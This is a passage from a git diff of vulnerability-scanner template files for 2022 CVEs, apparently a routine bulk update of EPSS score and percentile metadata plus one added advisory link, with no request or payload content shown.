-20,7 +20,7 @@ info: cve-id: CVE-2022-28080 cwe-id: CWE-89 epss-score: 0.01427 - epss-percentile: 0.85092 + epss-percentile: 0.85099 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index f4dce3eb86..dd20c13790 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-28117 cwe-id: CWE-918 epss-score: 0.01914 - epss-percentile: 0.87272 + epss-percentile: 0.87277 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index ce35f4db2a..28ab07fd79 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-28219 cwe-id: CWE-611 epss-score: 0.97398 - epss-percentile: 0.99893 + epss-percentile: 0.99894 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 6c4e049dc5..489c623ab3 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-28290 cwe-id: CWE-79 epss-score: 0.00117 - epss-percentile: 0.45396 + epss-percentile: 0.4541 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index c16894d76c..f0a82b985e 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-28363 cwe-id: CWE-79 epss-score: 0.00237 - epss-percentile: 0.61623 + epss-percentile: 0.6165 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index b9b1b9731a..ceda1a6c38 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28365 cwe-id: CWE-425 epss-score: 0.00561 - epss-percentile: 0.75165 + epss-percentile: 0.75188 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index d8f8f3c1d7..392a4d33fa 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-2863 cwe-id: CWE-22 epss-score: 0.61483 - epss-percentile: 0.97444 + epss-percentile: 0.97445 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index aa25c43445..6754926017 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-28923 cwe-id: CWE-601 epss-score: 0.00514 - epss-percentile: 0.74042 + epss-percentile: 0.74069 cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 93bb18e0c2..7d768b7007 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-28955 cwe-id: CWE-287 epss-score: 0.02263 - epss-percentile: 0.884 + epss-percentile: 0.88404 cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index 542b2e0ba0..c71ec3ce68 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-29004 cwe-id: CWE-79 epss-score: 0.00243 - epss-percentile: 0.62039 + epss-percentile: 0.62065 cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index b4de505431..33f4d545ab 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-29005 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46885 + epss-percentile: 0.46897 cpe: cpe:2.3:a:online_birth_certificate_system_project:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 0a900e4e78..5d5aef986b 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29014 epss-score: 0.79768 - epss-percentile: 0.97944 + epss-percentile: 0.97946 cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index b8dc09d3c1..18023dde34 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29078 cwe-id: CWE-94 epss-score: 0.11863 - epss-percentile: 0.94715 + epss-percentile: 0.94717 cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index b02b6d9662..6e904494ab 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-29153 cwe-id: CWE-918 epss-score: 0.01022 - epss-percentile: 0.82145 + epss-percentile: 0.82155 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 99e3c34582..9e7248d291 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29272 cwe-id: CWE-601 epss-score: 0.00188 - epss-percentile: 0.56083 + epss-percentile: 0.56107 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index 3e8d1243d3..33d996758f 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-29298 cwe-id: CWE-22 epss-score: 0.15611 - epss-percentile: 0.95311 + epss-percentile: 0.9531 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 48fd5ee2e3..5e9cfd7491 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-29303 cwe-id: CWE-78 epss-score: 0.9555 - epss-percentile: 0.99185 + epss-percentile: 0.99186 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 596c72cae2..9da4379597 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-29349 cwe-id: CWE-79 epss-score: 0.012 - epss-percentile: 0.8365 + epss-percentile: 0.8366 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 1a16be4018..7fcf14594b 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29383 cwe-id: CWE-89 epss-score: 0.4904 - epss-percentile: 0.97128 + epss-percentile: 0.97132 cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index 9863160358..dc20214bcd 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29455 cwe-id: CWE-79 epss-score: 0.0018 - epss-percentile: 0.55092 + epss-percentile: 0.55116 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 5a58cf87bb..d2a32a555d 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29464 cwe-id: CWE-22 epss-score: 0.97356 - epss-percentile: 0.99864 + epss-percentile: 0.99865 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 9ec259a922..29a12166a3 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -12,13 +12,14 @@ info: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 epss-score: 0.00239 - epss-percentile: 0.61789 + epss-percentile: 0.61816 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 531025d3b8..981c96a680 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29775 cwe-id: CWE-287 epss-score: 0.01158 - epss-percentile: 0.83312 + epss-percentile: 0.83321 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 7f85b3c2aa..f8df40459d 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30073 cwe-id: CWE-79 epss-score: 0.00226 - epss-percentile: 0.6076 + epss-percentile: 0.60789 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 32e7cd9f0b..42d5a6c256 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30489 cwe-id: CWE-79 epss-score: 0.00117 - epss-percentile: 0.45396 + epss-percentile: 0.4541 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 8ee5708f7d..11084a3179 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30512 cwe-id: CWE-89 epss-score: 0.0148 - epss-percentile: 0.85352 + epss-percentile: 0.8536 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index af24dea412..8648dbe329 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30513 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43633 + epss-percentile: 0.43656 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 50dfd78296..ee35b1c45c 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-30514 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43633 + epss-percentile: 0.43656 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 1693375bd0..2828265950 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-30525 cwe-id: CWE-78 epss-score: 0.97506 - epss-percentile: 0.99978 + epss-percentile: 0.99977 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 790a094a75..f00df92983 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3062 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 10a60cdf68..7199a9ce8f 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-30776 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49992 + epss-percentile: 0.50012 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index c4d0c445ce..3f3d03d966 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30777 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47412 + epss-percentile: 0.47423 cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 7ce1cff559..a7f78c8684 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31268 cwe-id: CWE-22 epss-score: 0.00787 - epss-percentile: 0.79506 + epss-percentile: 0.79515 cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index a23e4d879c..9c9c604e08 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31269 cwe-id: CWE-798 epss-score: 0.00174 - epss-percentile: 0.54382 + epss-percentile: 0.54403 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index 876b191077..b7a7055cf8 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31299 cwe-id: CWE-79 epss-score: 0.00199 - epss-percentile: 0.57562 + epss-percentile: 0.57593 cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 0f21e01366..3f698dcfd6 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-31373 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40811 + epss-percentile: 0.40834 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index e4224ceab2..afa4d9a32e 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-3142 cwe-id: CWE-89 epss-score: 0.00572 - epss-percentile: 0.7545 + epss-percentile: 0.75473 cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index a0c74602bd..0701c13c93 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31474 cwe-id: CWE-22 epss-score: 0.02203 - epss-percentile: 0.88225 + epss-percentile: 0.8823 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 739cc4f205..19743cdf48 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31499 cwe-id: CWE-78 epss-score: 0.29402 - epss-percentile: 0.9637 + epss-percentile: 0.96373 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index fceea852c0..9ce4952a46 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31656 cwe-id: CWE-287 epss-score: 0.88737 - epss-percentile: 0.98365 + epss-percentile: 0.98367 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index bfad02f6c7..662c583f7e 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-31798 cwe-id: CWE-384 epss-score: 0.0012 - epss-percentile: 0.46046 + epss-percentile: 0.4606 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index 999994ed6c..9063ed4729 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31814 cwe-id: CWE-78 - epss-score: 0.96683 - epss-percentile: 0.99517 + epss-score: 0.96595 + epss-percentile: 0.99489 cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 2869dfff2c..c02d7dac70 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31845 cwe-id: CWE-668 epss-score: 0.00887 - epss-percentile: 0.80789 + epss-percentile: 0.80803 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index b4adf6085e..76dc5e05de 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31846 cwe-id: CWE-668 epss-score: 0.00887 - epss-percentile: 0.80789 + epss-percentile: 0.80803 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index cdd5ef7ae8..078698bf92 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-31847 cwe-id: CWE-425 epss-score: 0.00892 - epss-percentile: 0.80853 + epss-percentile: 0.80867 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 157629d078..7d806dfbc1 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31854 cwe-id: CWE-434 epss-score: 0.062 - epss-percentile: 0.92761 + epss-percentile: 0.92766 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 1ec75c72fc..ecbd1120dd 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31879 cwe-id: CWE-89 epss-score: 0.05592 - epss-percentile: 0.92421 + epss-percentile: 0.92428 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 6c95629c16..2682cce193 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31974 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 8f95bad4b4..126fbf08ed 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31975 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 76b8c09df5..5b949dfb20 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31976 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.83186 + epss-percentile: 0.83196 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 389dbf0308..55f8a9c57a 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31977 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.83186 + epss-percentile: 0.83196 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index c6b487cc58..baf2490a3d 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31978 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.83186 + epss-percentile: 0.83196 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index 78a521fcb5..1d8fab9147 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31980 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 3f51383947..ee0db293e7 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31981 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 3ff4573ad7..3a4a4d3cd9 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31982 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index 6d4e1923c5..9903fe7331 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31983 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index f19d780436..116a71df24 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31984 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 